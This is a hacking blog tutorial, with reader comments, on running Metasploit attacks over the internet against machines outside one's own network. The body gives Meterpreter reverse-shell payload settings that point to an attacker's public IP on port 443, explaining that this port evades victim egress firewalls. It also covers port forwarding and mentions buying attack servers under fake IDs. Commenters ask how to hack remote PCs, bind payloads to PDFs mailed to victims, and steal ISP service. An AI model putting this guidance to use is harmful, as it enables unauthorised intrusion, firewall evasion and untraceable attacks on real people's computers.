• 8,365
  • 91
  • +477
  • 578
How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

Bookmark

Type : Tutorial

Level : Medium, Advanced

A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network :-) .

Requirement :

1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)

2. Dedicated Server

3. Cloud Server(I haven't try this :-) ) e.g : Amazon

4. Internet With Public IP

5. You can control router by yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY) :-)

2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.

3. Cloud server –> I haven't trying this…maybe someone can share :-)

4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.

5. Control router by ourselves to redirect incoming connection or outgoing connection.

Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :

Hacking WAN not LAN

Information(Attacker) :

– Attacker1 use local IP address –> 192.168.8.8

– Attacker1 have public IP address –> 73.67.123.85

– Attacker1 can control his router to redirect any incoming/outgoing traffic.

– Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.

Information(Victim) :

– Victim1 have local IP address –> 192.168.1.2

– Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection

– Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack? :

Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :

TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website

TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS

etc(you can scan it first but be careful).

From the information above, usually attacker can create some payload and options like this :

set payload windows/meterpreter/reverse_tcp

set lhost 73.67.123.85

set lport 443

When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.

You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding :-)

Update :

If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows)

Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….

Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.

You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise :-)

Hope you found it useful.

If information I wrote here was wrong, let me know I'll correct it :-)

Get the latest hacking tutorial by subscribe to this website :

Subscribe Hacking Tutorial

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

76 Responsesto “How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic”

  1. There is a related and interesting blog post on the Netresec blog about how the meterpreter reverse_https backdoors can be detected.
    http://www.netresec.com/?page=Blog&month=2011-07&post=How-to-detect-reverse_https-backdoors

  2. Xt says:

    A demo video of this would be helpful. 

  3. w0lF 3¥e says:

    V4L i lik ur tuts… :)
    I,ve a problem! My ISP provides a dynamic Wan ip so….i created account in no-ip and creatd a host…& installed DUC their free client program…then i portforwd my router to my Lan ip…..DO I HAVE TO PROVIDE THE NO- IP HOSTNAME IN LHOST IN METASPLOIT PAYLOAD SETTING…PLS XPLAIN HOW TO USE NO-IP HOST NAME INORDER TO PROPERLY GET MY METERPRETER REVERSE CONNECTION!!! PLS HELP V4L!

  4. Hitch4000 says:

    Hi,
    nice tutorial!
    I was just wondering, if you don't have a static IP. Couldn't you just use no-ip(http://www.no-ip.com/) to create a hostname to point to your dynamic IP?

    And then set localhost like this: set lhost <yourhostname>
    Bind the payload to an PDF file, and mail it to a victim

    Do you think this is posible?  

     

  5. Rijju says:

    Bro How To Setup VPN ? :@

  6. Rijju says:

    bRo Just Ek Bat BAtado Ke Port Forwarding Ke Liye Jo Apne tarika Diya He Isme Jo Ip he Wo Router Ki Ip He yA Host Ip He ?

  7. Papgaur says:

    Do u have to use backtrack to hack a remote pc ? I only have metaspolit with armitage. can u use just this instead? will it work on windows 7???

    • v4L says:

      #Papgaur
      You also can use it in Windows, afaik there’s metasploit in Windows…but if you use Linux(I’m using Backtrack) it will be more simple and easier. I’m suggest using Backtrack because this distro already designed to do computer hacking / pentest.

  8. Mohit says:

    hey  bro  how  to  OPEN  closed  port  m  using  USB  DONGLE  nd  my ISP has BLOCKED  ALL PORTS.so  when i pratice  ur attack  in  my  lab  i didn't get successfull due to closed  ports . 
     
     
    one more  thing  how to use  metasploit  to  hack  web server  . and web application  give me ny tutorial  

    • v4L says:

      #Mohit
      usually an ISP server will not block all of your port, but they will filter it. If you use USB dongle, it just affect your PC, not a whole network.
      you need to find which port are open both victim & attacker (usually port 80, 443, etc)

  9. sivaraaj says:

    Sir how to install VPS server….?

  10. orsettobubu says:

    I managed to configure a DNS server so that the external client use my DNS server but when the client enters into facebook giousto dns not resolve the false one.
    How to use a dns sever CENTOS I miss something in the configuration of named.conf? I hope it can help

  11. subiyanto says:

    yup ok**banget untuk kami kaum yg tertidas**untuk pedidikan**

  12. piyush says:

     
    hey im a big fan of your blog and hats off to your tutorials :D
    ok let me get to the point
    i was trying to port forward my router so that i can use metasploit over the net but unfortunately it isnt working i dont know why
    here are the settings which i used:-
    in the port forwarding tab i have given my local ip address:192.168.1.x
    with the port no:443
    i have configured the network of my virtual machine to bridge 
    in back track i have configured it to use a static ip: 192.168.1.x(which i have configured in the router in the port forwarding tab)
    DNS1:8.8.8.8
    DNS2:8.8.4.4
    after doing all this and setting a credential harvester method i gave my ip to my friend(192.168.1.x)
    but nothing , he said it gave a 404 error 
    i dont know why :(
    please help me out in doing port forwarding stuff if im doing it wrong
    peace

    • v4L says:

      #piyush
      if you give that ip 192.168.1.x to your friend, of course won’t work..it’s local port…you should give your router address..
      on your router usually there’s forwarding port…so when someone open ip like : 121.23.45.72:9999 the router should redirect that request to your local ip address.

  13. piyush says:

    thanx for your lightning fast comment bro… :D
    i have done accordingly you said but when i use the java applet attack method it ask me if in using a NAT i type "yes" 
    then it says IP address of the set web server i type "my local IP"
    then it says is your payload handler on diffrent IP i type "no" 
    after all that it says failed to blind to 192.168.1.4:80 
    i dont know why ?
    please help 
    and im a NOOB please do elaborate 
    thanx

  14. joand says:

    HI .
    I read your tuts thats very cool really.. i need your help little )) how can i find other computers in my lan ..everytime i try nmap result is 1 host up(thats me) ..i want to try sslstrip but for that i dont find any computer for proceed ..i have beetel router ..i hope you can solve this issue ))
    thanks

    • v4L says:

      #joand
      did you have other clients connected with your local network?
      if yes and you still find nothing, then it’s because the firewall blocked your nmap request.
      if you ask to scan other ip outside your network, the answers is yes and no….
      yes if you can route your network to the network destination you want to scan
      no if you can’t do that

  15. joand says:

    hi someone can tell ..how to scan ip behind the router …becouse everytime i scan wd nmap result is 1 host up..how i can get other host computer

  16. rk says:

    I was waiting for the stuff for years… the way u explained is just Great

  17. joand says:

    thank perfect answer ))))

  18. jaond says:

    do need to telnet every WAN ip to execute MITM? even i have access to router login and password..can you please make a detail tutorial on MITM on WAN?  it is possible to telnet WAN ip ?

    • v4L says:

      #joand
      btw usually MITM do inside a local network(but doesn’t mean it can’t do in public network)…
      yes you need to remote your server on the internet…but it’s better to learn on your local network..
      yes it’s possible if the server has a vulnerability.

  19. joand says:

    Sir the problem is i do not have any other host computer in my lan network…and i want to know how can i find other host computer to execute any attack like MITM?

    • v4L says:

      #joand
      if you already know the logic for this MITM, it will much easier for you to understanding further…
      if not, then my suggestion is : it’s better you try on your local network..if you don’t have other computer, then build a virtual machine and learn + try it first on your computer how to perform this.

  20. joand says:

    i have virtual machine backtrack OS .and i do successfully mitm on my window xp….and got all the ssl logs… in Lan all successful execute
    as i say i have two ip ..lan is .192.168.1.x…and wan ip is 122.145.23.x like that..scan wan ip i got result many host ip live . …here is the question how can i redirect all outgoing and incoming traffic of these wan ip's through my host computer..
    please if possible  tell in detail thank you for your previous reply :)

  21. joand says:

    if i knew how to do it i would not ask you LOL …

  22. joand says:

    Give a man a fish …make me smile ))) it true indeed
    i know a guy who is also alone in his lan network but he is doing mitm successfully on other guys comp..just dnt know how he get these comps for attack ..and he dnt even want to tell me lol ))) i try my best to find way but smtimes got confuse and run in many directions ))

  23. Baldassarre says:

     
    Hi v4L, 
    your tutorials are great.
    For this kind of attack, how can I find the victim's open ports? For example I have his public ip and then what I have to do? I've tried to forward a port and it succeded, it was really open that port, but I need to forward a port that the victim has open too! How can I find it? 
    I thank you for your time
    Baldassarre

    • v4L says:

      #Baldassarre
      Actually if you saw the picture, you can scan victim 2 directly;
      but if it was victim 1, while you scan the ip, it’s not actual victim 1 ip address but it was the router(victim 1 was behind the router).
      btw if you read this tutorial, it wasn’t talk about scanning ip address or something you describe in your question. :-)

  24. timetraveler says:

    Hi my friend, I have port forward my router and i made a nessus scan of a remote host. It’s vulnerable and i’m trying to exploit it. How do i set up my payload, should i set my open port or should i set the port of the vulnerable application (php)?

  25. john D says:

    Hello.i want to ask if the hack is possible to made without the VPS or other host server just using our internal or external IP can be work?thanks a lot

  26. Avinash says:

    can we hack any internet service provider and can use internet free of cost with airtel,docomo,idea?

  27. Deepsa says:

    hi, i want to remote access xp cmd in lan via ip address through lhost and rhost method i’m using backtrack r1 …do not want to use any virus, pdf, link etc,etc…i just know victim local ip address …will u plz help me

  28. Bree says:

    Hi , I dont have access to the router administration (only my father have the pswd :p and won’t give it to me )I’m runing bt can I do NAPT just by using iptables in order to do this :
    192.168.1.12 : 443 = xx.xx.xx.xx : yyy
    xx.xx.xx.xx is my public ip and yyy the port that the payload will use .. help please :'(

  29. Rahul says:

    can we hack a PC which is from another country or another state or city?
    let me clear it if i want to hack a pc and he has their own internet connection and i have a pc and i have my own internet connection. can i hack ? or for WAN hacking 1st we need to connect our backtrack with their internet(WAN) ?

  30. Boris says:

    MAN YOU ARE A TOTAL STUD, FIRST DAY READING AND IM ADDICTED. THANK YOU! GREETINGS FROM BULGARIA

  31. Ronit says:

    hello vishnu ….
    i need to know that how can i remotely control my cafes route from my home with a laptop via internet…

  32. jason says:

    Hi.
    This things was as easy as 123 for me before. That was when I still on a static IP and have a router. But I moved to a place where I can only connect to the cyberspace via 3G dongle that is behind an ISP NAT and have a Dynamic IP.
    Any advice on doing this using 3G dongle? I also don't have a router to port forward to my local ip. I tried No-IP but it didn't work.
    Thanks

  33. zain says:

    u didnt told what ip address we have to set for victum wan ip or local ip coz if we set wan ip it will only connect with router not lan ips explain plz

  34. Jake Lancaster says:

    I was wondering when u say Attacker1 & Attacker2 those are just 2 different ways you can* attack correct you dont actually have to have 2 attackers?

  35. victor says:

    Thanks for your tutorial …

    An ISP assigns dynamic IPs to its subscribers via WIFI or 3G dongle. the question is:

    Will the wan hack work in this scenario? I don’t think so, but if yes how port forwarding works?

    • v4L says:

      #victor

      it’s depend how the ISP share their dynamic IP, whether they use public or private IP.

      if use private, port forwarding will not work except you can access their router. If public, yes you can directly connect to your machine.

  36. root says:

    when i port forwarding , and i scanned my ip with nmap to see if the port is open that show port filtered , that mean is working? or it isn’t?

  37. nomad says:

    a question, if i use RPORT 443 and another LPORT like… LPORT 666, will it work if i forward port 666 to my attacker machine ?

  38. TheKingofdemon33 says:

    How do i port forward iPhone hotspot internet? Please help.

  39. hunter says:

    should i connect wire to wire with local lan to perform attack out of lan??

  40. Frank says:

    I’ve read over this many times. I see how you attack victim 2. Of course. But victim 1 is behind the router so how do you direct a query to a LAN side up without being on the network? I know I can ping a router public ip (wan) but if I’m not on the network I can’t see anything on the other side.

Trackbacks/Pingbacks

  1. Create EXE Backdoor Using Metasploit and Backtrack 5 in 4 simple steps | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] You also can learn how to implement this method to attack over the internet, but please read my previous …
  2. 4 Langkah Hacking Kedalam Jcow Social Networking Web Server « Exohacker - [...] Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94… Jauh lebih baik kalau kawan-kawan mau …
  3. Hacking Jcow Social Networking Webserver » Akiramitsu - [...] Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94… Jauh lebih baik kalau kawan-kawan mau …

Leave a Reply

Your email address will not be published. Required fields are marked *